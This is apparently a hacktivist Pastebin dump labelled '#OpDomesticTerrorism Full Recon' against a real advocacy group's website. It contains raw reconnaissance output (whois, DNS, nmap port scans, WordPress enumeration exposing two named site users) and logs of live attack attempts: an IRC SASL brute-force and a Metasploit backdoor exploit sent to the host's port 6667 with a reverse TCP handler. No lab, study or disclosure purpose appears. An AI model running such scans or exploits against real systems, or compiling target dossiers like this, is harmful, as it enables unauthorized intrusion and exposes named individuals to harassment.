API tools faq
paste
Advertisement
Guest User

Anonymous JTSEC #OpDomesticTerrorism Full Recon #9

a guest
Aug 15th, 2018
278
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 53.11 KB | None | 0 0
raw download clone embed print report
  1. #######################################################################################################################################
  2. Hostname www.njoathkeepers.org ISP Linode, LLC
  3. Continent North America Flag
  4. US
  5. Country United States Country Code US
  6. Region New Jersey Local time 15 Aug 2018 07:03 EDT
  7. City Newark Postal Code 07175
  8. IP Address 192.155.88.60 Latitude 40.736
  9. Longitude -74.172
  10. #######################################################################################################################################
  11. HostIP:192.155.88.60
  12. HostName:njoathkeepers.org
  13.  
  14. Gathered Inet-whois information for 192.155.88.60
  15. ---------------------------------------------------------------------------------------------------------------------------------------
  16.  
  17.  
  18. inetnum: 192.155.7.0 - 192.156.131.255
  19. netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
  20. descr: IPv4 address block not managed by the RIPE NCC
  21. remarks: ------------------------------------------------------
  22. remarks:
  23. remarks: You can find the whois server to query, or the
  24. remarks: IANA registry to query on this web page:
  25. remarks: http://www.iana.org/assignments/ipv4-address-space
  26. remarks:
  27. remarks: You can access databases of other RIRs at:
  28. remarks:
  29. remarks: AFRINIC (Africa)
  30. remarks: http://www.afrinic.net/ whois.afrinic.net
  31. remarks:
  32. remarks: APNIC (Asia Pacific)
  33. remarks: http://www.apnic.net/ whois.apnic.net
  34. remarks:
  35. remarks: ARIN (Northern America)
  36. remarks: http://www.arin.net/ whois.arin.net
  37. remarks:
  38. remarks: LACNIC (Latin America and the Carribean)
  39. remarks: http://www.lacnic.net/ whois.lacnic.net
  40. remarks:
  41. remarks: IANA IPV4 Recovered Address Space
  42. remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
  43. remarks:
  44. remarks: ------------------------------------------------------
  45. country: EU # Country is really world wide
  46. admin-c: IANA1-RIPE
  47. tech-c: IANA1-RIPE
  48. status: ALLOCATED UNSPECIFIED
  49. mnt-by: RIPE-NCC-HM-MNT
  50. mnt-lower: RIPE-NCC-HM-MNT
  51. mnt-routes: RIPE-NCC-RPSL-MNT
  52. created: 2011-07-11T12:36:48Z
  53. last-modified: 2015-10-29T15:17:40Z
  54. source: RIPE
  55.  
  56. role: Internet Assigned Numbers Authority
  57. address: see http://www.iana.org.
  58. admin-c: IANA1-RIPE
  59. tech-c: IANA1-RIPE
  60. nic-hdl: IANA1-RIPE
  61. remarks: For more information on IANA services
  62. remarks: go to IANA web site at http://www.iana.org.
  63. mnt-by: RIPE-NCC-MNT
  64. created: 1970-01-01T00:00:00Z
  65. last-modified: 2001-09-22T09:31:27Z
  66. source: RIPE # Filtered
  67.  
  68. % This query was served by the RIPE Database Query Service version 1.91.2 (BLAARKOP)
  69.  
  70.  
  71.  
  72. Gathered Inic-whois information for njoathkeepers.org
  73. ---------------------------------------------------------------------------------------------------------------------------------------
  74. Domain Name: NJOATHKEEPERS.ORG
  75. Registry Domain ID: D169964607-LROR
  76. Registrar WHOIS Server: whois.domain.com
  77. Registrar URL: www.domain.com
  78. Updated Date: 2015-08-11T21:49:34Z
  79. Creation Date: 2013-10-17T12:03:14Z
  80. Registry Expiry Date: 2019-10-17T12:03:14Z
  81. Registrar Registration Expiration Date:
  82. Registrar: Domain.com, LLC
  83. Registrar IANA ID: 886
  84. Registrar Abuse Contact Email: compliance@domain-inc.net
  85. Registrar Abuse Contact Phone: +1.6022262389
  86. Reseller:
  87. Domain Status: clientTransferProhibited https://�U@icann�^-ԋ.o�rg/eppW�.U�#cU@lient]�.U�T�U@ansfe�������rProhib�U@ited
  88. Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
  89. Registrant Organization: Domain Privacy Group
  90. Registrant State/Province: MA
  91. Registrant Country: US
  92. Name Server: FNS1.DNSPARK.NET
  93. Name Server: FNS2.DNSPARK.NET
  94. DNSSEC: unsigned
  95. URL of the ICANN Whois Inaccuracy Complaint Form https://www.icann.org/wicf/)
  96. >>> Last update of WHOIS database: 2018-08-15T11:09:14Z <<<
  97. #######################################################################################################################################
  98. [i] Scanning Site: http://njoathkeepers.org
  99.  
  100.  
  101.  
  102. B A S I C I N F O
  103. =======================================================================================================================================
  104.  
  105.  
  106. [+] Site Title: New Jersey Oath Keepers
  107. [+] IP address: 192.155.88.60
  108. [+] Web Server: nginx/1.8.1
  109. [+] CMS: WordPress
  110. [+] Cloudflare: Not Detected
  111. [+] Robots File: Found
  112.  
  113. -------------[ contents ]----------------
  114. User-agent: *
  115. Disallow: /calendar/action~posterboard/
  116. Disallow: /calendar/action~agenda/
  117. Disallow: /calendar/action~oneday/
  118. Disallow: /calendar/action~month/
  119. Disallow: /calendar/action~week/
  120. Disallow: /calendar/action~stream/
  121. Disallow: /calendar/action~undefined/
  122. Disallow: /calendar/action~http:/
  123. Disallow: /calendar/action~default/
  124. Disallow: /calendar/action~poster/
  125. Disallow: /calendar/action~*/
  126. Disallow: /*controller=ai1ec_exporter_controller*
  127. Disallow: /*/action~*/
  128. -----------[end of contents]-------------
  129.  
  130.  
  131. H T T P H E A D E R S
  132. =======================================================================================================================================
  133.  
  134.  
  135. [i] HTTP/1.1 301 Moved Permanently
  136. [i] Server: nginx/1.8.1
  137. [i] Date: Wed, 15 Aug 2018 11:10:46 GMT
  138. [i] Content-Type: text/html; charset=UTF-8
  139. [i] Connection: close
  140. [i] X-Powered-By: PHP/5.5.38-1~dotdeb+7.1
  141. [i] Set-Cookie: PHPSESSID=fbtfmkufunnmt946lelrsv8ub0; path=/
  142. [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
  143. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  144. [i] Pragma: no-cache
  145. [i] Location: http://www.njoathkeepers.org/
  146. [i] HTTP/1.1 200 OK
  147. [i] Server: nginx/1.8.1
  148. [i] Date: Wed, 15 Aug 2018 11:10:48 GMT
  149. [i] Content-Type: text/html; charset=UTF-8
  150. [i] Connection: close
  151. [i] X-Powered-By: PHP/5.5.38-1~dotdeb+7.1
  152. [i] Set-Cookie: PHPSESSID=r2i1hr7bp01g7fbms8a3u8btb3; path=/
  153. [i] Expires: Thu, 19 Nov 1981 08:52:00 GMT
  154. [i] Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  155. [i] Pragma: no-cache
  156. [i] Link: <http://www.njoathkeepers.org/wp-json/>; rel="https://api.w.org/"
  157. [i] Link: <http://www.njoathkeepers.org/>; rel=shortlink
  158.  
  159. #######################################################################################################################################
  160. [?] Enter the target: http://www.njoathkeepers.org/
  161. [!] IP Address : 192.155.88.60
  162. [!] Server: nginx/1.8.1
  163. [!] Powered By: PHP/5.5.38-1~dotdeb+7.1
  164. [+] Clickjacking protection is not in place.
  165. [!] CMS Detected : WordPress
  166. [?] Would you like to use WPScan? [Y/n] Y
  167. [+] URL: http://www.njoathkeepers.org/
  168. [+] Started: Wed Aug 15 07:10:28 2018
  169. [+] Interesting header: LINK: <http://www.njoathkeepers.org/wp-json/>; rel="https://api.w.org/"
  170. [+] Interesting header: LINK: <http://www.njoathkeepers.org/>; rel=shortlink
  171. [+] Interesting header: SERVER: nginx/1.8.1
  172. [+] Interesting header: X-POWERED-BY: PHP/5.5.38-1~dotdeb+7.1
  173. [+] robots.txt available under: http://www.njoathkeepers.org/robots.txt [HTTP 200]
  174. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/*/action~*/ [HTTP 404]
  175. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/*controller=ai1ec_exporter_controller* [HTTP 404]
  176. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~*/ [HTTP 404]
  177. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~agenda/ [HTTP 200]
  178. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~default/ [HTTP 200]
  179. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~http:/ [HTTP 200]
  180. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~month/ [HTTP 200]
  181. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~oneday/ [HTTP 200]
  182. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~poster/ [HTTP 200]
  183. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~posterboard/ [HTTP 200]
  184. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~stream/ [HTTP 200]
  185. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~undefined/ [HTTP 200]
  186. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~week/ [HTTP 200]
  187. [+] XML-RPC Interface available under: http://www.njoathkeepers.org/xmlrpc.php [HTTP 405]
  188. [+] API exposed: http://www.njoathkeepers.org/wp-json/ [HTTP 200]
  189. [!] 2 users exposed via API: http://www.njoathkeepers.org/wp-json/wp/v2/users
  190. +----+---------------+----------------------------------------------+
  191. | ID | Name | URL |
  192. +----+---------------+----------------------------------------------+
  193. | 1 | Adam Kosmin | http://www.njoathkeepers.org/author/akosmin/ |
  194. | 2 | Edward Durfee | http://www.njoathkeepers.org/author/stepman/ |
  195. +----+---------------+----------------------------------------------+
  196. [+] Found an RSS Feed: http://www.njoathkeepers.org/feed/ [HTTP 200]
  197.  
  198. [+] Enumerating WordPress version ...
  199.  
  200. [+] WordPress version 4.9.8 (Released on 2018-08-02) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
  201.  
  202. [+] WordPress theme in use: njoathkeepers - v3.0
  203.  
  204. [+] Name: njoathkeepers - v3.0
  205. | Location: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/
  206. | Readme: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/readme.txt
  207. | Style URL: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/style.css
  208. | Theme Name: njoathkeepers
  209. | Theme URI: http://www.dizzain.com/blog/freebies/free-wordpress-theme-drochilli/
  210. | Description: Minimalistic darken WordPress theme with two columns, left-sidebar, fluid width and widget-ready.
  211. | Author: Dizzain Inc.
  212. | Author URI: http://www.dizzain.com/
  213.  
  214. [+] Enumerating plugins from passive detection ...
  215. | 6 plugins found:
  216.  
  217. [+] Name: all-in-one-event-calendar - v2.5.32
  218. | Latest version: 2.5.32 (up to date)
  219. | Last updated: 2018-08-03T20:07:00.000Z
  220. | Location: http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/
  221. | Readme: http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/readme.txt
  222.  
  223. [+] Name: contact-form-7 - v5.0.3
  224. | Latest version: 5.0.3 (up to date)
  225. | Last updated: 2018-07-12T12:37:00.000Z
  226. | Location: http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/
  227. | Readme: http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/readme.txt
  228.  
  229. [+] Name: email-subscribers - v3.5.4
  230. | Last updated: 2018-08-09T05:23:00.000Z
  231. | Location: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/
  232. | Readme: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/readme.txt
  233. | Changelog: http://www.njoathkeepers.org/wp-content/plugins/email-subscribers/changelog.txt
  234. [!] The version is out of date, the latest version is 3.5.6
  235.  
  236. [+] Name: login-sidebar-widget - v5.7.9
  237. | Latest version: 5.7.9 (up to date)
  238. | Last updated: 2018-07-27T17:19:00.000Z
  239. | Location: http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/
  240. | Readme: http://www.njoathkeepers.org/wp-content/plugins/login-sidebar-widget/readme.txt
  241.  
  242. [+] Name: pta-member-directory - v1.6.9
  243. | Latest version: 1.6.9 (up to date)
  244. | Last updated: 2017-09-18T01:17:00.000Z
  245. | Location: http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/
  246. | Readme: http://www.njoathkeepers.org/wp-content/plugins/pta-member-directory/readme.txt
  247.  
  248. [+] Name: taskfreak - v1.0.19
  249. | Latest version: 1.0.19 (up to date)
  250. | Last updated: 2016-08-11T06:51:00.000Z
  251. | Location: http://www.njoathkeepers.org/wp-content/plugins/taskfreak/
  252. | Readme: http://www.njoathkeepers.org/wp-content/plugins/taskfreak/readme.txt
  253.  
  254. [+] Finished: Wed Aug 15 07:11:50 2018
  255. [+] Elapsed time: 00:01:21
  256. [+] Requests made: 113
  257. [+] Memory used: 118.371 MB
  258. [-] Honeypot Probabilty: 50%
  259. ----------------------------------------
  260. [~] Trying to gather whois information for www.njoathkeepers.org
  261. [+] Whois information found
  262. [-] Unable to build response, visit https://who.is/whois/www.njoathkeepers.org
  263. ----------------------------------------
  264. [+] Robots.txt retrieved
  265. User-agent: *
  266. Disallow: /wp-admin/
  267. Allow: /wp-admin/admin-ajax.php
  268. Disallow: /calendar/action~posterboard/
  269. Disallow: /calendar/action~agenda/
  270. Disallow: /calendar/action~oneday/
  271. Disallow: /calendar/action~month/
  272. Disallow: /calendar/action~week/
  273. Disallow: /calendar/action~stream/
  274. Disallow: /calendar/action~undefined/
  275. Disallow: /calendar/action~http:/
  276. Disallow: /calendar/action~default/
  277. Disallow: /calendar/action~poster/
  278. Disallow: /calendar/action~*/
  279. Disallow: /*controller=ai1ec_exporter_controller*
  280. Disallow: /*/action~*/
  281. ---------------------------------------------------------------------------------------------------------------------------------------
  282. API count exceeded - Increased quota available with membership
  283. --------------------------------------------------------------------------------------------------------------------------------------
  284.  
  285. [+] DNS Records
  286.  
  287. [+] Host Records (A)
  288. www.njoathkeepers.orgHTTP: (mail.nycpatriot.org) (192.155.88.60) AS63949 Linode, LLC United States
  289.  
  290. [+] TXT Records
  291.  
  292. [+] DNS Map: https://dnsdumpster.com/static/map/njoathkeepers.org.png
  293.  
  294. [>] Initiating 3 intel modules
  295. [>] Loading Alpha module (1/3)
  296. [>] Beta module deployed (2/3)
  297. [>] Gamma module initiated (3/3)
  298. No emails found
  299. No hosts found
  300. [+] Virtual hosts:
  301. ---------------------------------------------------------------------------------------------------------------------------------------
  302. [~] Crawling the target for fuzzable URLs
  303. [+] Found 2 fuzzable URLs
  304. http://www.njoathkeepers.org//webcal://www.njoathkeepers.org/?plugin=all-in-one-event-calendar&controller=ai1ec_exporter_controller&action=export_events&no_html=true
  305. [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
  306. #######################################################################################################################################
  307. dnsenum VERSION:1.2.4
  308.  
  309. ----- njoathkeepers.org -----
  310.  
  311.  
  312. Host's addresses:
  313. __________________
  314.  
  315. njoathkeepers.org. 3589 IN A 192.155.88.60
  316.  
  317.  
  318. Name Servers:
  319. ______________
  320.  
  321. fns1.dnspark.net. 3586 IN A 66.55.82.13
  322. fns2.dnspark.net. 46 IN A 192.184.90.32
  323.  
  324.  
  325. Mail (MX) Servers:
  326. ___________________
  327.  
  328. mail.yourhostingaccount.com. 3600 IN A 65.254.254.52
  329. mail.yourhostingaccount.com. 3600 IN A 65.254.254.50
  330. mail.yourhostingaccount.com. 3600 IN A 65.254.254.58
  331. mail.yourhostingaccount.com. 3600 IN A 65.254.254.53
  332. mail.yourhostingaccount.com. 3600 IN A 65.254.254.55
  333. mail.yourhostingaccount.com. 3600 IN A 65.254.254.54
  334. mail.yourhostingaccount.com. 3600 IN A 65.254.254.57
  335. mail.yourhostingaccount.com. 3600 IN A 65.254.254.56
  336. mail.yourhostingaccount.com. 3600 IN A 65.254.254.51
  337.  
  338.  
  339. Trying Zone Transfers and getting Bind Versions:
  340. _________________________________________________
  341.  
  342.  
  343. Trying Zone Transfer for njoathkeepers.org on fns1.dnspark.net ...
  344.  
  345. Trying Zone Transfer for njoathkeepers.org on fns2.dnspark.net ...
  346.  
  347. brute force file not specified, bay.
  348. #######################################################################################################################################
  349. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-15 07:07 EDT
  350. Nmap scan report for njoathkeepers.org (192.155.88.60)
  351. Host is up (0.071s latency).
  352. rDNS record for 192.155.88.60: mail.nycpatriot.org
  353. Not shown: 460 closed ports, 6 filtered ports
  354. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  355. PORT STATE SERVICE
  356. 80/tcp open http
  357. 143/tcp open imap
  358. 465/tcp open smtps
  359. 587/tcp open submission
  360. 993/tcp open imaps
  361. 3333/tcp open dec-notes
  362. 5554/tcp open sgi-esphttp
  363. 6667/tcp open irc
  364. 7777/tcp open cbt
  365. 8001/tcp open vcom-tunnel
  366.  
  367. Nmap done: 1 IP address (1 host up) scanned in 3.62 seconds
  368. #######################################################################################################################################
  369. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-15 07:07 EDT
  370. Nmap scan report for njoathkeepers.org (192.155.88.60)
  371. Host is up (0.14s latency).
  372. rDNS record for 192.155.88.60: mail.nycpatriot.org
  373.  
  374. PORT STATE SERVICE
  375. 53/udp open|filtered domain
  376. 67/udp open|filtered dhcps
  377. 68/udp open|filtered dhcpc
  378. 69/udp open|filtered tftp
  379. 88/udp open|filtered kerberos-sec
  380. 123/udp open ntp
  381. 137/udp open|filtered netbios-ns
  382. 138/udp open|filtered netbios-dgm
  383. 139/udp open|filtered netbios-ssn
  384. 161/udp open|filtered snmp
  385. 162/udp open|filtered snmptrap
  386. 389/udp open|filtered ldap
  387. 520/udp open|filtered route
  388. 2049/udp open|filtered nfs
  389.  
  390. Nmap done: 1 IP address (1 host up) scanned in 4.01 seconds
  391. #######################################################################################################################################
  392.  
  393. ^ ^
  394. _ __ _ ____ _ __ _ _ ____
  395. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  396. | V V // o // _/ | V V // 0 // 0 // _/
  397. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  398. <
  399. ...'
  400.  
  401. WAFW00F - Web Application Firewall Detection Tool
  402.  
  403. By Sandro Gauci && Wendel G. Henrique
  404.  
  405. Checking http://njoathkeepers.org
  406. Generic Detection results:
  407. No WAF detected by the generic detection
  408. Number of requests: 14
  409. http://njoathkeepers.org [301 Moved Permanently] Cookies[PHPSESSID], Country[UNITED STATES][US], HTTPServer[nginx/1.8.1], IP[192.155.88.60], PHP[5.5.38-1~dotdeb+7.1], RedirectLocation[http://www.njoathkeepers.org/], X-Powered-By[PHP/5.5.38-1~dotdeb+7.1], nginx[1.8.1]
  410. http://www.njoathkeepers.org/ [200 OK] Cookies[PHPSESSID], Country[UNITED STATES][US], HTTPServer[nginx/1.8.1], IP[192.155.88.60], JQuery[1.12.4], MetaGenerator[WordPress 4.9.8], PHP[5.5.38-1~dotdeb+7.1], Script[text/javascript], Title[New Jersey Oath Keepers], UncommonHeaders[link], WordPress[4.9.8], X-Powered-By[PHP/5.5.38-1~dotdeb+7.1], nginx[1.8.1]
  411. #######################################################################################################################################
  412. wig - WebApp Information Gatherer
  413.  
  414.  
  415. Scanning http://www.njoathkeepers.org...
  416. _______________________________ SITE INFO _______________________________
  417. IP Title
  418. 192.155.88.60 New Jersey Oath Keepers
  419.  
  420. ________________________________ VERSION ________________________________
  421. Name Versions Type
  422. WordPress 4.9.8 CMS
  423. PHP 5.5.38-1~dotdeb+7.1 Platform
  424. nginx 1.8.1 Platform
  425. jQuery 2.0.0 JavaScript
  426. FreeBSD 10 | 11 OS
  427. openSUSE tumbleweed OS
  428.  
  429. ______________________________ INTERESTING ______________________________
  430. URL Note Type
  431. /wp-login.php Wordpress login page Interesting
  432. /readme.html Readme file Interesting
  433. /robots.txt robots.txt index Interesting
  434. /login/ Login Page Interesting
  435.  
  436. _________________________________ TOOLS _________________________________
  437. Name Link Software
  438. wpscan https://github.com/wpscanteam/wpscan WordPress
  439. CMSmap https://github.com/Dionach/CMSmap WordPress
  440.  
  441. _________________________________________________________________________
  442. Time: 45.5 sec Urls: 215 Fingerprints: 40401
  443. #######################################################################################################################################
  444. HTTP/1.1 301 Moved Permanently
  445. Server: nginx/1.8.1
  446. Date: Wed, 15 Aug 2018 11:09:11 GMT
  447. Content-Type: text/html; charset=UTF-8
  448. Connection: keep-alive
  449. X-Powered-By: PHP/5.5.38-1~dotdeb+7.1
  450. Set-Cookie: PHPSESSID=p19uh5ol7fu2tmld5oa63cc504; path=/
  451. Expires: Thu, 19 Nov 1981 08:52:00 GMT
  452. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  453. Pragma: no-cache
  454. Location: http://www.njoathkeepers.org/
  455.  
  456. Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-15 07:09 EDT
  457. Nmap scan report for njoathkeepers.org (192.155.88.60)
  458. Host is up (0.27s latency).
  459. rDNS record for 192.155.88.60: mail.nycpatriot.org
  460.  
  461. PORT STATE SERVICE VERSION
  462. 6667/tcp open irc BitlBee IRCd
  463. | irc-botnet-channels:
  464. |_ &bitlbee
  465. | irc-sasl-brute:
  466. | Accounts: No valid accounts found
  467. | Statistics: Performed 12 guesses in 157 seconds, average tps: 0.1
  468. |_ ERROR: The service seems to have failed or is heavily firewalled...
  469. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  470. Device type: WAP|general purpose
  471. Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (93%)
  472. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
  473. Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (93%)
  474. No exact OS matches for host (test conditions non-ideal).
  475. Network Distance: 1 hop
  476. Service Info: Host: :mail.nycpatriot.org
  477.  
  478. TRACEROUTE (using port 6667/tcp)
  479. HOP RTT ADDRESS
  480. 1 378.73 ms mail.nycpatriot.org (192.155.88.60)
  481.  
  482. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  483. Nmap done: 1 IP address (1 host up) scanned in 199.67 seconds
  484.  
  485. +-------------------------------------------------------+
  486. | METASPLOIT by Rapid7 |
  487. +---------------------------+---------------------------+
  488. | __________________ | |
  489. | ==c(______(o(______(_() | |""""""""""""|======[*** |
  490. | )=\ | | EXPLOIT \ |
  491. | // \\ | |_____________\_______ |
  492. | // \\ | |==[msf >]============\ |
  493. | // \\ | |______________________\ |
  494. | // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
  495. | // \\ | ********************* |
  496. +---------------------------+---------------------------+
  497. | o O o | \'\/\/\/'/ |
  498. | o O | )======( |
  499. | o | .' LOOT '. |
  500. | |^^^^^^^^^^^^^^|l___ | / _||__ \ |
  501. | | PAYLOAD |""\___, | / (_||_ \ |
  502. | |________________|__|)__| | | __||_) | |
  503. | |(@)(@)"""**|(@)(@)**|(@) | " || " |
  504. | = = = = = = = = = = = = | '--------------' |
  505. +---------------------------+---------------------------+
  506.  
  507.  
  508. =[ metasploit v4.17.3-dev ]
  509. + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
  510. + -- --=[ 538 payloads - 41 encoders - 10 nops ]
  511. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  512.  
  513. RHOST => njoathkeepers.org
  514. RHOSTS => njoathkeepers.org
  515. [*] Started reverse TCP double handler on 10.211.1.133:4444
  516. [*] njoathkeepers.org:6667 - Connected to njoathkeepers.org:6667...
  517. :mail.nycpatriot.org NOTICE * :BitlBee-IRCd initialized, please go on
  518. [*] njoathkeepers.org:6667 - Sending backdoor command...
  519. [*] Exploit completed, but no session was created.
  520.  
  521. #######################################################################################################################################
  522.  
  523. I, [2018-08-15T07:13:46.645155 #22642] INFO -- : Initiating port scan
  524. I, [2018-08-15T07:17:06.865973 #22642] INFO -- : Using nmap scan output file logs/nmap_output_2018-08-15_07-13-46.xml
  525. I, [2018-08-15T07:17:06.887563 #22642] INFO -- : Discovered open port: 192.155.88.60:465
  526. I, [2018-08-15T07:17:08.534153 #22642] INFO -- : Discovered open port: 192.155.88.60:993
  527. W, [2018-08-15T07:17:10.172522 #22642] WARN -- : Yasuo did not find any potential hosts to enumerate
  528. #######################################################################################################################################
  529. [*] Processing domain njoathkeepers.org
  530. [+] Getting nameservers
  531. 192.184.90.32 - fns2.dnspark.net
  532. 66.55.82.13 - fns1.dnspark.net
  533. [-] Zone transfer failed
  534.  
  535. [+] TXT records found
  536. "v=spf1 include:servers.mcsv.net ?all"
  537.  
  538. [+] MX records found, added to target list
  539. 0 mail.yourhostingaccount.com.
  540.  
  541. [*] Scanning njoathkeepers.org for A records
  542. 192.155.88.60 - njoathkeepers.org
  543. 192.155.88.60 - www.njoathkeepers.org
  544. #######################################################################################################################################
  545. Ip Address Status Type Domain Name Server
  546. ---------- ------ ---- ----------- ------
  547. 192.155.88.60 200 host www.njoathkeepers.org nginx/1.8.1
  548. #######################################################################################################################################
  549. Original* njoathkeepers.org 192.155.88.60 NS:fns1.dnspark.net MX:mail.yourhostingaccount.com
  550. Subdomain njoat.hkeepers.org -
  551. Subdomain njoath.keepers.org 69.172.201.153 NS:ns1.uniregistrymarket.link
  552. Subdomain njoathkee.pers.org 185.53.178.6 NS:ns1.parkingcrew.net MX:mail.h-email.net
  553. Subdomain njoathkeeper.s.org 50.63.46.1 NS:A.SERVICE.AFILIASDNS.INFO
  554. #######################################################################################################################################
  555. [i] The remote host tried to redirect to: http://www.njoathkeepers.org/
  556. [?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N] >Y
  557. [+] URL: http://www.njoathkeepers.org/
  558. [+] Started: Wed Aug 15 07:09:40 2018
  559.  
  560. [+] Interesting header: LINK: <http://www.njoathkeepers.org/wp-json/>; rel="https://api.w.org/"
  561. [+] Interesting header: LINK: <http://www.njoathkeepers.org/>; rel=shortlink
  562. [+] Interesting header: SERVER: nginx/1.8.1
  563. [+] Interesting header: X-POWERED-BY: PHP/5.5.38-1~dotdeb+7.1
  564. [+] robots.txt available under: http://www.njoathkeepers.org/robots.txt [HTTP 200]
  565. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/*/action~*/ [HTTP 404]
  566. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/*controller=ai1ec_exporter_controller* [HTTP 404]
  567. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~*/ [HTTP 404]
  568. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~agenda/ [HTTP 200]
  569. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~default/ [HTTP 200]
  570. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~http:/ [HTTP 200]
  571. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~month/ [HTTP 200]
  572. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~oneday/ [HTTP 200]
  573. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~poster/ [HTTP 200]
  574. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~posterboard/ [HTTP 200]
  575. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~stream/ [HTTP 200]
  576. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~undefined/ [HTTP 200]
  577. [+] Interesting entry from robots.txt: http://www.njoathkeepers.org/calendar/action~week/ [HTTP 200]
  578. [+] XML-RPC Interface available under: http://www.njoathkeepers.org/xmlrpc.php [HTTP 405]
  579. [+] API exposed: http://www.njoathkeepers.org/wp-json/ [HTTP 200]
  580. [!] 2 users exposed via API: http://www.njoathkeepers.org/wp-json/wp/v2/users
  581. +----+---------------+----------------------------------------------+
  582. | ID | Name | URL |
  583. +----+---------------+----------------------------------------------+
  584. | 1 | Adam Kosmin | http://www.njoathkeepers.org/author/akosmin/ |
  585. | 2 | Edward Durfee | http://www.njoathkeepers.org/author/stepman/ |
  586. +----+---------------+----------------------------------------------+
  587. [+] Found an RSS Feed: http://www.njoathkeepers.org/feed/ [HTTP 200]
  588.  
  589. [+] Enumerating WordPress version ...
  590.  
  591. [+] WordPress version 4.9.8 (Released on 2018-08-02) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
  592.  
  593. [+] WordPress theme in use: njoathkeepers - v3.0
  594.  
  595. [+] Name: njoathkeepers - v3.0
  596. | Location: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/
  597. | Readme: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/readme.txt
  598. | Style URL: http://www.njoathkeepers.org/wp-content/themes/njoathkeepers/style.css
  599. | Theme Name: njoathkeepers
  600. | Theme URI: http://www.dizzain.com/blog/freebies/free-wordpress-theme-drochilli/
  601. | Description: Minimalistic darken WordPress theme with two columns, left-sidebar, fluid width and widget-ready.
  602. | Author: Dizzain Inc.
  603. | Author URI: http://www.dizzain.com/
  604.  
  605. [+] Enumerating plugins from passive detection ...
  606. | 6 plugins found:
  607.  
  608. [+] Name: all-in-one-event-calendar - v2.5.32
  609. | Latest version: 2.5.32 (up to date)
  610. | Last updated: 2018-08-03T20:07:00.000Z
  611. | Location: http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/
  612. | Readme: http://www.njoathkeepers.org/wp-content/plugins/all-in-one-event-calendar/readme.txt
  613.  
  614. [+] Name: contact-form-7 - v5.0.3
  615. | Latest version: 5.0.3 (up to date)
  616. | Last updated: 2018-07-12T12:37:00.000Z
  617. | Location: http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/
  618. | Readme: http://www.njoathkeepers.org/wp-content/plugins/contact-form-7/readme.txt
  619.  
  620. [+] Name: email-subscribers - v3.5.4
